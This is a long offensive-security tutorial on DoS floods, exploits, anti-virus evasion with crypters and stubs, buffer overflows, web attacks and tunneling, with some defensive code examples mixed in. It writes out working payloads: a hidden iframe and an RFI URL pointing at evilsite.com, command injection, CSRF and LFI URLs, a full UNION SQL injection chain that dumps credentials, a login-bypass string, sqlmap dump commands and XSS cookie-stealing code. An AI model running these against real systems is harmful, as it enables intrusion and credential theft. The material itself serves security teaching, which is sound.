This abuses an issue in the TCP 3-way handshake that can be exploited by an attacker to take down a service. It happens when an attacker sends many SYN requests to a server but never replies to the SYN/ACKs. The server waits until the connection times out, keeping a slot of RAM occupied for that whole period. The attacker must open enough slots in memory before their earlier requests start timing out, or the attack will fail.
Mitigation for SYN Floods
The best way to deal with SYN floods is SYN cookies. With SYN cookies the server sends the appropriate SYN/ACK response but discards the SYN it received, so a SYN flood fails. This works because SYN floods rely on the server keeping each SYN for a specified period of time so that the queue can be filled up.
Firewalls can also easily detect flood attacks, as most have built-in rules about the maximum number of connections one address is allowed to have.
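To make the SYN cookie idea concrete, this added example (not from the original notes) models both servers in plain Python: a classic listener with a bounded half-open queue, and a SYN-cookie listener whose SYN/ACK sequence number is an HMAC of the connection 4-tuple and a time slot, so the final ACK can be verified with nothing stored. The flood itself is simulated in-process with made-up addresses; the cookie layout (8-bit slot, 24-bit MAC) and the 64-second slot are assumptions loosely modelled on the Linux implementation, not a reproduction of it.

```python
import hashlib
import hmac
import time

MASK32 = 0xFFFFFFFF
SLOT_SECONDS = 64   # coarse time slot encoded in the cookie (assumed value)
MAX_SLOT_AGE = 1    # accept cookies minted in the current or the previous slot


class NaiveServer:
    """Classic listener: every SYN gets an entry in a bounded half-open queue until
    its ACK arrives (or it times out). A flood of unanswered SYNs fills the queue."""

    def __init__(self, backlog):
        self.backlog = backlog
        self.half_open = {}          # (src, sport, dst, dport) -> server ISN
        self._next_isn = 1000

    def on_syn(self, src, sport, dst, dport):
        key = (src, sport, dst, dport)
        if key not in self.half_open and len(self.half_open) >= self.backlog:
            return None              # queue full: the SYN is dropped, client gets nothing
        self._next_isn = (self._next_isn + 1) & MASK32
        self.half_open[key] = self._next_isn
        return self._next_isn        # sequence number sent in the SYN/ACK

    def on_ack(self, src, sport, dst, dport, ack_number):
        key = (src, sport, dst, dport)
        isn = self.half_open.get(key)
        if isn is None or ((isn + 1) & MASK32) != (ack_number & MASK32):
            return False
        del self.half_open[key]      # handshake completed, slot released
        return True


class SynCookieServer:
    """SYN cookies: the SYN/ACK sequence number is an HMAC of the 4-tuple and a time
    slot, so the server can verify the final ACK without having stored the SYN."""

    def __init__(self, secret, clock=time.time):
        self._secret = secret
        self._clock = clock
        self.half_open = {}          # always empty: nothing is stored per SYN

    def _slot(self):
        return int(self._clock()) // SLOT_SECONDS

    def _cookie(self, src, sport, dst, dport, slot):
        msg = f"{src}:{sport}>{dst}:{dport}@{slot}".encode()
        mac = hmac.new(self._secret, msg, hashlib.sha256).digest()
        # 32-bit ISN: top 8 bits carry the slot counter, low 24 bits the truncated MAC.
        return ((slot & 0xFF) << 24) | int.from_bytes(mac[:3], "big")

    def on_syn(self, src, sport, dst, dport):
        return self._cookie(src, sport, dst, dport, self._slot())

    def on_ack(self, src, sport, dst, dport, ack_number):
        presented = (ack_number - 1) & MASK32
        now = self._slot()
        for age in range(MAX_SLOT_AGE + 1):
            slot = now - age
            if (slot & 0xFF) != (presented >> 24):
                continue
            expected = self._cookie(src, sport, dst, dport, slot)
            if hmac.compare_digest(expected.to_bytes(4, "big"), presented.to_bytes(4, "big")):
                return True
        return False                 # forged, stale, or for a SYN we never answered


def simulate_flood(server, flood_count):
    """Send flood_count SYNs from constructed spoofed sources that never ACK, then
    check whether one legitimate client can still complete its handshake."""
    for i in range(flood_count):
        server.on_syn(f"203.0.113.{i % 254 + 1}", 1024 + i, "192.0.2.10", 80)
    legit = ("198.51.100.7", 51000, "192.0.2.10", 80)
    isn = server.on_syn(*legit)
    if isn is None:
        return False                 # SYN dropped: the legitimate client is denied
    return server.on_ack(*legit, (isn + 1) & MASK32)


if __name__ == "__main__":
    print("naive server survives flood:", simulate_flood(NaiveServer(backlog=128), 1000))
    print("SYN-cookie server survives flood:", simulate_flood(SynCookieServer(b"rotating-secret"), 1000))
```

The cost of the stateless scheme is visible in `on_ack`: a cookie is only honoured for about two slots, so a client that takes longer than that to send its ACK is turned away.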
UDP Flood
This abuses a property of stateless UDP: when no service is listening on a port, the host replies with an ICMP unreachable. As a result, an attacker need only send a large number of UDP packets to different closed ports, and the server responds with a large number of ICMP packets, eventually causing the system to go offline.
Mitigation for UDP Floods
Firewalls should be installed to filter out traffic to non-open ports, causing the UDP flood to fail because the UDP packets never reach the intended host.
ICMP Flood
This attack involves sending massive amounts of ping packets to a host, forcing a reply for each. The idea is similar to the previous flood attacks, as the system must open a slot of RAM to deal with each ping.
Mitigation for ICMP Floods
ICMP floods are easily stopped by firewalls. Most firewalls have automatic ICMP flood detection systems built in.
Smurf Attack
Smurf attacks involve spoofing the source IP address to get one system to flood another. The system that receives the spoofed packet believes the supplied source address is the one that sent it, so it responds to that address. If spammed with such spoofed packets, the server will in turn spam the victim.
Mitigation for Smurf Attacks
Simple firewall rules should stop this kind of attack.
Ping Of Death
This attack involves sending malformed ping packets in an attempt to crash the victim. The crash can be of the TCP/IP stack or of the system itself.
These attacks don't work much any more. They only tend to work on much older systems.
Teardrop
This attack involves sending mangled IP fragments in an attempt to crash the system. These attacks don't work much any more either.
However, the last documented case was in 2009 and affected Windows Vista and 7. It had to do with SMB not handling IP fragments properly.
LOIC
Low Orbit Ion Cannon or LOIC is a popular tool for flood attacks. This tool has the ability to send TCP, UDP and ICMP floods at a specified host.
LOIC has been used heavily by the group Anonymous, and has helped down many unsavory sites like RIAA and MPAA.
SSL DoS
This attack has been known about since 2003 and is a flaw in SSL's renegotiation feature. It allows an attacker to take down a server completely from just one connection, rather than many as in traditional flood attacks.
The hack was first made public by the THC Team.
Exploits
Exploit - A malicious piece of code meant to compromise a system.
Compiling
Some exploits need to be compiled before use. This is because one exploit might not fit every system; you usually must edit the code and then compile it.
For C and C++ you must use the gcc compiler.
• gcc -o <app> <file>
This will compile the code into an executable named <app>.
For Python, Perl, Ruby, and other scripting languages, just make the file executable.
• chmod +x <file>
To find useful exploits, cat and grep /pentest/exploits/exploitdb/files.csv
Warning! Some exploits may be unreliable.
Resources
Exploit code site
• milw0rm.com ← Down
• exploit-db.com
Remote Administration Tools
Theory
Remote Administration Tools, or RATs, allow an attacker to take complete control of a remote computer, often allowing them to spy on and infect other users on a network. The goal of these tools is to make it easy for an attacker to administer many bots, and also to formulate attacks against other targets using those bots.
Uses
Many free and commercial RATs are available for download. They often allow an attacker to keylog, steal passwords, perform flood attacks, and even remotely view the user's screen and webcam. Attackers often route their internet connections through infected hosts when attacking servers to ensure anonymity.
Darkcomet
CyberGate
Solitude
Cerberus
Blackshades
Metasploit
Metasploit is an open source exploitation framework used to write exploit code for applications simply and easily. It is written in Ruby and is extremely powerful. It has many great features which make it a great addition to any pen-tester's library.
msfconsole
This program opens an interactive console for Metasploit.
• msfconsole
This lets us pass commands to Metasploit in an interactive environment.
From here we can type commands directly to MSF.
msfcli
msfweb
msfgui
Updating Metasploit
Exploitation
Payloads
Meterpreter
Encoders
Auxiliary
Credential Collection
db_autopwn
Browser Autopwn
Anti-virus Bypass
Theory
Anti-virus bypassing is any sort of program that attempts to get a malicious program past an anti-virus and onto a machine. This is often done by using code obfuscation techniques to hide the malicious code.
Droppers
Droppers are programs that contain no malicious code themselves but go out to the internet, download a malicious program, and execute it.
Theory
Droppers are a semi-competent threat, despite being picked up by anti-viruses most of the time.
However, the age-old rule applies: the longer a dropper has been around, the more likely it is to be caught. Newer droppers might not have this problem.
They are dangerous because an anti-virus can't keep tabs on everything running on a computer in real time. Abusing this, a dropper downloads a program inconspicuously and then loads it into memory without the user's consent.
Crypters
Crypters are programs designed to encrypt an executable so that an anti-virus may not pick it up.
Theory
Crypters work by encrypting an executable using any number of methods and then affixing a program, called a stub, to the front of it to decrypt the code. This gives better control over the conditions the code runs in and avoids detection by hiding the executable inside other processes.
The Encrypter
The encrypter works in this fashion:
1. Generate a stub source code file.
2. Compile the stub.
3. Place the stub at the beginning of a file.
4. Place a unique separator after the compiled stub.
5. Open a malicious executable.
6. Encrypt this executable.
7. Place the encrypted executable at the end of the file.
When the executable is run, the stub springs into action and decrypts and runs the code.
The Stub
A stub works like this:
1. Find the current directory of the process.
2. Open the executable.
3. Look for the unique separator.
4. Take only the encrypted executable and save it.
5. Decrypt the executable.
6. Inject the decrypted executable into a random process but, first, try to inject into explorer.
Antis
Antis are functions in a crypter that stop the executable from running if certain programs are running. For instance, a common "anti" is to stop execution if the program is inside a VMware virtual machine. Another is to not run if Sandboxie is running. Antis are generally a smart idea if the executable might come under inspection at some point.
Junk Code
Junk code is a technique used by malware authors to change the overall code of their program by adding segments of code that do not alter the program's behaviour at all. A common piece of junk code creates an array, fills it with random numbers, reads the numbers back, and then deletes the array.
Buffer Overflows
This attack is one of the most commonly exploited according to OWASP. Its potency can range from a DoS to a full system compromise, making it a dangerous vulnerability to have present.
Theory
Buffer Overflow – An exploit that presents itself in the C/C++ languages but, theoretically, can be exploited in any language that allows a program to commit data to memory without first checking the bounds of that data. A buffer overflow occurs when a program commits user input to memory without first checking the bounds of that input. When the data is committed to the stack this causes a segmentation fault, which results in a crash under normal circumstances. In an attack, however, the attacker can overwrite the saved return address on the stack and so control EIP, gaining control of program flow. Depending on the severity of the bug and the protections in place, exploiting it may differ under each circumstance.
Consider this code.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    char buffer[8];             /* fixed-size stack buffer */

    if (argc < 2) {             /* avoid dereferencing a missing argument */
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }

    strcpy(buffer, argv[1]);    /* Copies the 1st arg into buffer with no bounds check: the overflow */
    printf("buffer is %s\n", buffer);
    printf("DONE!\n");
    return 0;
}
This code creates a buffer which holds 8 characters. However, no bounds checking is done. As a result, an attacker could input more than 8 characters and strcpy would still write them to memory. This overflows the buffer and, since the buffer lives on the stack, overwrites the stack beyond it, causing a segmentation fault. This could possibly allow an attacker to take control of the program flow.
Protections
As a result of widespread exploitation, many protections have been developed to combat exploitation.
ASLR – Stands for Address Space Layout Randomization. This protection randomizes the upper bits of the addresses of program code and the stack, making it harder for exploiters to reliably locate particular launchpad instructions. It's extremely popular and used in almost everything.
DEP – Stands for Data Execution Prevention. This comes in two forms, hardware and software, and is controlled by the /NX flag. The hardware version marks data memory non-executable, stopping exploits from succeeding. A developer can still set certain memory areas as executable in case they need to execute data from them. Software DEP is analogous to SafeSEH.
Stack Cookies – Controlled by the /GS flag. This puts a random 8-byte key before the saved EIP on the stack. Before a return is executed, the program checks the key against the one stored by the system. If they don't match (meaning an overflow occurred and EIP was modified), it stops execution and terminates the program to prevent exploitation.
SafeSEH/SEHOP - A compiler option that builds a linked list of valid SEH pointers. If an SEH pointer doesn't match an entry in the list, it is not executed and the program is terminated.
NoSEH – This disables SEH altogether, stopping exploits that rely on it.
Common Attacks
Despite the ample amount of protections, they aren't all fool-proof.
Launchpad – This technique is used to bypass ASLR. Because of the stack's address randomization, you can't point EIP directly at the top of the stack, since the address won't be the same after a reboot. Instead, you find a non-ASLR module and search it for a JMP ESP instruction. Using this, you can jump to the top of the stack reliably.
SEH Overwrite – This takes advantage of SEH chains with no protections. You overwrite an SEH pointer with your own value, sending execution to a launchpad.
Egghunters – An egghunter is a piece of shellcode meant to rip through pages in memory looking for a specific pattern called an egg key. This egg key is usually 8 bytes in length. Skape wrote a large paper on the subject, detailing different methods one could use to rip through memory without triggering exceptions.
Bypassing Stack Cookies – Stack cookies are a huge problem for exploiters, as they are difficult to get around. The easiest method is to overwrite the SEH chain and then trigger an exception before the cookie check is reached. This method is easily broken by SafeSEH or NoSEH. The other way is to find a way to guess or calculate the stack cookie. Skape also wrote a piece on reducing the effective entropy of a stack cookie.
Problems
Bad Characters – Bad characters are bytes that have special meaning, or that are filtered out or transmuted during an exploit. Common ones are 0x00, 0x0a, and 0x0d. 0x00, for example, is the C/C++ string terminator and, when used in an exploit, truncates everything past the 0x00 byte. 0x0a and 0x0d are the line feed and carriage return characters.
Null Byte Addresses – Main program code (code contained within the executable itself) starts at 0x00??0000. As a result, one cannot use addresses from the main executable, as they will contain a 0x00 byte.
Character Transmutation – This is a problem that happens when input is filtered or encoded before being committed to a buffer. For instance, a program might strip out any non-ASCII characters (anything outside 00-7F); anything higher gets transmuted. This also happens in UNICODE to ASCII translation.
Fuzzers
Fuzzer – A testing program made to find buffer overflows by varying the size of the data sent.
SPIKE - A well-made fuzzing application. It has its own scripting language.
Sfuzzer – A simple fuzzer meant to be an easier alternative to SPIKE.
Fuzzing works by passing commands to a server with varying data sizes. If the program crashes during a fuzz, it is possibly vulnerable to a buffer overflow. For instance, take a program that accepts network data and then copies this data to the stack. A fuzzer will try A x 20 for the data. If that doesn't crash it, it will send A x 40, and so on. If the program does no bounds checking, it will eventually crash when the data gets too big and overwrites EIP.
Web Based Attacks
Web based attacks are a very large set of attacks that can be performed on web applications. Often, these attacks involve a program not sanitizing user supplied data correctly.
Zero Frames and Zero Images
Zero frames and zero images are a form of obfuscation, hiding HTML from the viewer of a webpage. Zero frames are created by setting an iframe's width and height to zero or one, resulting in a webpage being rendered that the user cannot see. This is a common way for attackers to hide malicious code in legitimate webpages, infecting users without their knowledge.
<iframe height=0 width=0 src="http://evilsite.com"></iframe>
Zero images work on the same principle but with an image instead. You can't render an entire webpage with one, though. They are more commonly used in cross site request forgery attacks.
Command Execution
Command execution takes advantage of unsanitized user input, which allows an attacker to inject commands directly into the server. This vulnerability usually involves a shell_exec() function in PHP.
Command execution techniques vary from OS to OS. Linux, for instance, with zero user input sanitation, could be compromised with:
• [space]&[space][command]; [command];
However, be aware that in most scripts you may have to satisfy certain requirements before the input will be passed along.
Cross Site Request Forgery
Cross Site Request Forgery, or CSRF, is an attack that abuses authentication mechanisms that allow users to stay logged in even after the website is closed in the browser. CSRF allows an attacker to force a user to perform actions without their knowledge or consent. It works like this: an attacker makes a URL that links to an action performed on a site. For instance,
• http://www.vulnsite.com?password="ichangedthis"&passwordconf="ichangedthis"&submit=submit
This example, if opened by an authenticated user, would change their password to "ichangedthis". If the link is opened directly, the user would see that the action was performed. A better way is to wrap the URL in <img> tags to make a zero image. This results in a hidden image that, when loaded, causes the action to be performed without the user's knowledge. You can also use a zero frame for this.
File Inclusion
These attacks revolve around files being included in PHP without restriction.
• http://vulnerablesite.com?page=include.php
This kind of attack contains two types of attacks, LFI (Local File Inclusion) and RFI (Remote File Inclusion).
Local
An LFI takes advantage of the ability to traverse directories locally on the system without interference. As a result, certain files could be given to the attacker, for instance the /etc/passwd file on Linux.
• http://vulnerablesite.com?page=/etc/passwd
Remote
An RFI takes advantage of being able to load remote files into the include. This can be more dangerous, as it can allow an attacker to run commands using the shell_exec() function in PHP.
• http://vulnerablesite.com?page=http://evilsite.com/evil.php
SQL Injections
A form of attack meant to pass commands directly to an SQL server by using escape characters and malformed input. It can also be used to bypass authentication mechanisms by forcing a condition to be true, and it can trick an SQL server into revealing database information.
URL
Say we have a site with a page called updates.php that takes its parameters from the URL:
• www.vulnsite.com/updates.php?id=1
Here we can pass parameters to the PHP application by changing the 1 in the URL to whatever we want. From here, we can begin testing to see if the site properly filters user input. It's easy to check this by passing the application a character that would raise an exception in the MySQL database. We can achieve this with a single quote ( ' ) character.
We can tell the application is vulnerable if an error is thrown.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
We can see that user input is not filtered properly and, as a result, we will be able to inject our own SQL statements.
First, we need to identify how many columns are in the table that controls the data on the page. We can do this by issuing commands to the server via the URL that will throw an error if a column does not exist. The ORDER BY statement will work for this.
• www.vulnsite.com/updates.php?id=1 ORDER BY 1;#
Alternatively, you can also use
• www.vulnsite.com/updates.php?id=1 ORDER BY 1--
This will most likely produce no errors, as the database will more than likely have more than one column. We slowly increase the number until an error is thrown.
Unknown column '20' in 'order clause'
Once we get the error, we can infer that the table has one fewer column than the number that threw the error, since the query worked before the number was increased again.
Once we know this, we can begin injecting data directly into our page in an attempt to find "vulnerable columns". The goal is to find someplace on the page to display the data we will be collecting later. We do this with a UNION SELECT statement. We form the statement with as many columns as we found.
• www.vulnsite.com/updates.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8;#
Also note that we change the page id to one that is not likely to exist, -1. This allows us to easily identify vulnerable columns.
Upon doing this we can inspect the page and see some of the numbers in our UNION SELECT showed up on the page. These numbers represent our vulnerable columns. We can inject commands and use these vulnerable columns to render this data visible to us.
We can inject a variety of commands in here to better understand the back-end servers.
For this example, we will pretend 1,2 and, 3 are all vulnerable columns.
• www.vulnsite.com/updates.php?id=-1 UNION SELECT @@VERSION,USER(),DATABASE(),4,5,6,7,8;#
This will put the current database version number in column one, the current database user in column two, and the database name in column three.
Next we are going to want to get the table names from the information_schema. Be wary of the version number: MySQL 4 will not let you read from the information_schema without elevated privileges.
• www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(table_name),@@VERSION,DATABASE(),4,5,6,7,8 FROM information_schema.tables WHERE table_schema=database();#
This will stuff the table names, separated by commas, into a vulnerable column. This allows us to see all the tables that we may want to compromise. Using this, we can begin to enumerate the contents of the tables.
For this example, we will pretend that the tables listed were content, users, and admin.
• www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(column_name),2,3,4,5,6,7,8 FROM information_schema.columns WHERE table_name='users';#
This will tell us all the column names for the table users. Once we have these, we can begin pulling out relevant information.
For this example, we will pretend the columns listed for users were, username, password, email, and id.
• www.vulnsite.com/updates.php?id=-1 UNION SELECT group_concat(username,0x3a,password,0x3a,email,0x3a,id),2,3,4,5,6,7,8 FROM users;#
This prints all the table data to the screen, separating each column with a colon (0x3a).
Here we have completed our attack and, accessed the previously hidden table data.
Authentication Bypass
This kind of attack is done by forging SQL queries that will always return true. This way we can bypass the login of a site, gaining access without a legitimate account.
An example would be a site that takes both a username and a password.
Upon putting in a correct username and password, a user can get in. Upon putting in a wrong username and password, a person is denied access.
This is done through an SQL query similar to this.
• SELECT * FROM users WHERE username='$user' and password='$pass';
By escaping the quotes, we can authenticate ourselves without even knowing the password and sometimes, even the username.
A simple authentication bypass statement would look like this.
• User: admin Password: 1' OR '1' = '1';#
This would make the statement:
• SELECT * FROM users WHERE username='admin' and password='1' OR '1' = '1';#';
Since the closing quote and semicolon are commented out, the statement's syntax is correct. On top of that, we can see that the condition in the password section will always be true, since 1 is always equal to itself.
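The bypass above comes down to one coding decision: whether the password is pasted into the SQL text or handed to the driver as a bound parameter. This added example (not from the original notes) runs the page's login query both ways against a constructed in-memory SQLite table, and also reproduces the single-quote probe from the URL section; it uses the `--` comment form from the ORDER BY example because SQLite, unlike MySQL, has no `#` comment, and the users and passwords are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table. Plaintext passwords keep the example short;
    a real application stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, user, password):
    """The page's query built by string interpolation: attacker-controlled quotes
    become part of the SQL, so the WHERE clause can be rewritten from the input."""
    query = f"SELECT * FROM users WHERE username='{user}' and password='{password}';"
    return conn.execute(query).fetchone() is not None


def login_safe(conn, user, password):
    """Same query with bound parameters: the values travel separately from the SQL,
    so a quote in the input is just a character, never syntax."""
    query = "SELECT * FROM users WHERE username=? and password=?"
    return conn.execute(query, (user, password)).fetchone() is not None


def quote_probe_raises(conn, login):
    """The page's detection step: a lone single quote makes the interpolated query
    malformed (a database error leaks out), while the parameterised one just fails to match."""
    try:
        login(conn, "'", "x")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    bypass = "1' OR '1' = '1'--"     # the page's payload, with -- as the comment marker
    print("vulnerable login, bypass payload :", login_vulnerable(db, "admin", bypass))
    print("parameterised login, same payload:", login_safe(db, "admin", bypass))
    print("single quote raises an error     :", quote_probe_raises(db, login_vulnerable))
```

The parameterised version keeps the identical SQL and behaviour for honest input; only the injected case changes, which is why it is the standard fix rather than input filtering.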
Blind
SQLmap
SQLmap is a tool for automated SQLi attacks. It will automatically find and use vulnerable columns, and also display the data from the tables it enumerates.
First off we need to use SQLmap to get a list of the databases.
• ./sqlmap.py -u "http://vulnsite.com/updates.php?id=1" --dbs
This will enumerate the available databases, allowing us to continue with our next step, enumerating the tables.
• ./sqlmap.py -u "http://vulnsite.com/updates.php?id=1" -D [database] --tables
Lastly, we can dump a table's contents using the dump option.
• ./sqlmap.py -u "http://vulnsite.com/updates.php?id=1" -D [database] -T [table] --dump
Cross Site Scripting (XSS)
Cross site scripting, or XSS, allows an attacker to inject code into URLs or webpages. These attacks often lead to mass compromises, since the attacker can place things like Java drive-bys on a reputable website. They are commonly used to steal authentication cookies, allowing an attacker to impersonate a victim.
Non-Persistent
These attacks aren't as bad as a persistent attack but can be just as damaging.
The attack involves abusing a form field or URL parameter that is not sanitized. This allows an attacker to craft a special URL that, when the victim opens it, reflects attack code onto the webpage.
This kind of attack is the most commonly exploited.
It involves storing code in the URL parameters, allowing an attacker to give a specific URL to people; when they follow it, the attack code is rendered on the page.
• www.vuln.com/updates.php?location=<p>EVIL CODE HERE!</p>
Persistent
Persistent (stored) XSS lets an attacker save client-side code on the server so that it is served to everyone who views the affected page. The implications are obvious: every visitor, not just those who follow a crafted link, executes the attacker's script.
For instance, imagine a website that takes a comment and posts it onto a webpage. An attacker can store HTML in the comment if proper output encoding or character checking is not in place.
For example, an attacker's comment could be:
<p>EVIL COMMENT</p>
That is harmless, but if it renders as markup rather than as text it confirms the problem. A more malicious comment:
<script>
alert(document.cookie);
</script>
This pops up the current cookies for the domain (a real attacker would send document.cookie to a server they control rather than display it).
In some cases script tags are filtered out by a blacklist. However, script tags aren't the only dangerous thing; any event-handler attribute runs script too:
<a href="fake.html" onmouseover="alert(document.cookie)">FAKE</a>
This runs JavaScript when the link is hovered over. Other vectors include injected <iframe> elements and zero-size <img> tags whose src or onerror handler carries the payload. The fix is to output-encode untrusted data for the context it lands in (HTML entity encoding for element content), not to blacklist tags.
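As an added example, not from the page: the comment-rendering site described above in three versions, unfiltered, with a script-tag blacklist, and with HTML output encoding, each fed the page's payloads. The sample comments are constructed, and the heuristic that flags surviving active content is this example's own.

```python
import html
import re

# Constructed comments: one benign, the page's harmless HTML test, and its two payloads.
SAMPLE_COMMENTS = [
    "Nice post!",
    "<p>EVIL COMMENT</p>",
    "<script>alert(document.cookie);</script>",
    '<a href="fake.html" onmouseover="alert(document.cookie)">FAKE</a>',
]

TEMPLATE = '<div class="comment">{}</div>'

SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)
# A surviving <script> tag, or any raw tag carrying an on*= event-handler attribute.
ACTIVE_CONTENT = re.compile(r"<\s*script|<[a-z][^>]*\son[a-z]+\s*=", re.IGNORECASE)


def render_unfiltered(comment):
    """The vulnerable site: the comment is dropped into the page as-is."""
    return TEMPLATE.format(comment)


def render_blacklist(comment):
    """A common 'fix': strip <script> tags and nothing else."""
    return TEMPLATE.format(SCRIPT_TAG.sub("", comment))


def render_escaped(comment):
    """Output encoding: every comment character is rendered as text, never as markup."""
    return TEMPLATE.format(html.escape(comment, quote=True))


def is_active(rendered_page):
    """Heuristic used here to show which renderings still hand the browser script."""
    return ACTIVE_CONTENT.search(rendered_page) is not None


def survey(comments=SAMPLE_COMMENTS):
    """For each renderer, how many of the comments still execute script."""
    renderers = {"unfiltered": render_unfiltered,
                 "blacklist": render_blacklist,
                 "escaped": render_escaped}
    return {name: sum(is_active(fn(c)) for c in comments)
            for name, fn in renderers.items()}


if __name__ == "__main__":
    for name, count in survey().items():
        print("%-10s %d of %d comments still active" % (name, count, len(SAMPLE_COMMENTS)))
```

The blacklist stops the script comment but the onmouseover link sails straight through it; only the escaped renderer neutralises everything, which is why output encoding rather than tag filtering is the fix.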
Web Based Exploitation Frameworks
OWASP Mantra
OWASP Mantra is a penetration testing minded browser which has many add-ons and tools built into it for testing web site vulnerabilities. It comes in two versions, Chromium (Windows only) and Firefox (Windows/Linux).
Port Tunneling
Port Tunneling – Redirecting network traffic through another port or a proxy to get around detection, firewalls, or network blocks.
Theory
In the following example the attacker is somewhere on the internet and the victim is behind a firewall that blocks all traffic on port X.
Tunneling works like so:
1. The attacker connects and sends data to the proxy on port X.
2. The proxy forwards the data it received on port X to the victim on port Y.
3. The victim receives the data on port Y and sends its reply back on Y.
4. The proxy receives the reply on port Y and forwards it out on port X.
5. The attacker receives the reply on port X.
In this example there is a middle man (the proxy) which redirects all the traffic. This lets the attacker communicate with the victim because the firewall blocks traffic on X but not on Y.
Because the victim only ever sees the proxy's address, this also helps protect the attacker's anonymity.
HTTP CONNECT Tunneling
HTTP proxies that support the CONNECT method will open a raw TCP connection to an arbitrary host and port on the client's behalf and then relay bytes in both directions, so any protocol can be carried through a proxy that was only meant to forward web traffic (provided the proxy allows that destination port).
All we do is netcat into the proxy and type the request line, followed by a blank line:
• CONNECT [server]:[port] HTTP/1.0
A reply whose status line begins HTTP/1.0 200 means the tunnel is up, and everything typed afterwards goes straight to [server]:[port].
SSL Tunneling
SSL tunneling is a technique to add SSL/TLS to programs or protocols that normally don't have it. It is useful when the environment blocks or inspects certain ports, or when you need encrypted communication between protocols that have no encryption of their own. However, the accepting party must terminate SSL/TLS as well, otherwise it will simply drop or misread the encrypted traffic. This can be done either by enabling SSL/TLS in the service itself or by running stunnel in server mode in front of it.
stunnel
stunnel – A free port-forwarding tool used as a wrapper to encrypt incoming and outgoing network traffic with SSL/TLS.
Stunnel also lets us pass firewalls and IDSs that do not inspect TLS, since the traffic is encrypted and can be sent through a legitimate SSL port such as 443.
Stunnel's configuration file is located at /etc/stunnel/stunnel.conf.
Once we have edited the configuration file, we can start stunnel using
• stunnel4
In server mode, be sure you have a certificate (and key) file and that the configuration's cert option points to it. In client mode, decide explicitly whether the server's certificate is verified; stunnel does not verify by default, which leaves the tunnel open to interception.
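A minimal stunnel.conf covering both roles, added here as an example and not taken from the page; the hostnames, ports and file paths are assumptions. The first service wraps a plaintext client tool in TLS and sends it out on 443; the second terminates TLS in front of a plaintext service.

```ini
; Client side: a plaintext tool connects to 127.0.0.1:8080 and stunnel carries it out over TLS on 443
[wrap-out]
client  = yes
accept  = 127.0.0.1:8080
connect = target.example.com:443
; verify the server certificate against a CA bundle; without this the tunnel can be intercepted
verify  = 2
CAfile  = /etc/ssl/certs/ca-certificates.crt

; Server side: terminate TLS on 443 and hand the plaintext to a local service on port 80
[wrap-in]
client  = no
accept  = 443
connect = 127.0.0.1:80
cert    = /etc/stunnel/stunnel.pem
```

On the client side, point the plaintext tool at 127.0.0.1:8080; on the server side, stunnel.pem must contain the certificate and its private key, or stunnel will refuse to start the service.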
SOCKS
SOCKS is a proxy protocol that relays arbitrary TCP connections (and, with SOCKS5, UDP) rather than just HTTP, so any client that speaks SOCKS can be sent through it. The destination sees only the proxy's address; the proxy operator, of course, sees everything.
SSH Tunneling
SSH Tunneling – Forwarding TCP connections through an established SSH session. The SSH client itself acts as the middleman, so no separate proxy host is needed and the traffic is encrypted between the client and the SSH server.
Local
Local port forwarding listens on a port on the client and carries every connection to it through the SSH session to a destination that is resolved from the SSH server's point of view.
• ssh -L [local-port]:[destination]:[destination-port] [user@host]
• ssh -L 8080:localhost:80 [user@host]
The second command redirects port 8080 on the client to port 80 on the SSH server itself (localhost is interpreted on the server side; put another hostname there to reach a machine behind the server).
Remote
Remote port forwarding is the reverse: it opens a listening port on the SSH server and carries connections made to it back through the tunnel to a destination on the client's side.
• ssh -R [remote-port]:[destination]:[destination-port] [user@host]
• ssh -R 5900:localhost:5900 [user@host]
The second command lets someone on the SSH server reach the VNC service on your machine by pointing their client at localhost:5900. By default the listening port binds to the server's loopback interface only; the GatewayPorts option in sshd_config controls whether it can be exposed to other hosts.
Dynamic
Dynamic forwarding turns the SSH client into a SOCKS proxy: any application pointed at it has its connections carried through the tunnel and opened from the SSH server.
• ssh -C -D [port] [user@host]
With this we can set most clients to use the SOCKS proxy and route their traffic through the SSH server (-C adds compression). This hides the traffic from the local network, not from the SSH server, which sees everything that leaves the tunnel.
Tor
Tor – A network of volunteer-run relays used as chained proxies to protect anonymity. Traffic is encrypted in layers, one for each relay on the path, so that no single relay sees both who is talking and to whom.
Theory
Tor works by using not just one proxy but several in a route sequence (a circuit). Tor has a large number of relays, and for each connection a random path through them is chosen, so that no one point on the route can link the source to the destination.
Installing
Using
Authentication Vulnerabilities
Theory
Authentication mechanisms must be treated with the utmost care. However, some technologies still in use today have extremely weak authentication systems, and some services send credentials entirely in plain text.
Problems With Networks
The big issue with networks is that someone can insert themselves in between a client and a server, allowing them to hear all traffic between them. Despite this there are secure ways of exchanging information even if a third party is listening.
Plain Text
This is the most vulnerable to attack. Usernames and passwords are sent in plain-text, allowing anyone to listen in. While this is the easiest to implement, this is the least secure.
FTP, POP3, SMTP (AUTH PLAIN/LOGIN) and HTTP (Basic authentication) all send credentials in the clear unless wrapped in TLS.
Hashing Systems
Hashing systems store and compare a one-way hash of the password instead of the password itself. A password can be turned into its hash, but the hash cannot be turned back into the password. This adds a layer of security but is a flawed methodology on its own: wherever the protocol lets a client authenticate by presenting the hash, the hash is as good as the password itself, so an attacker only needs to obtain the hash, not crack it, to compromise the account.
SMB/NTLM authentication is the classic example: the NT hash can be used directly (pass-the-hash). Common hash algorithms found in such systems:
MD4
DES
MD5
SHA1
NTLM
MYSQL
Challenge Systems
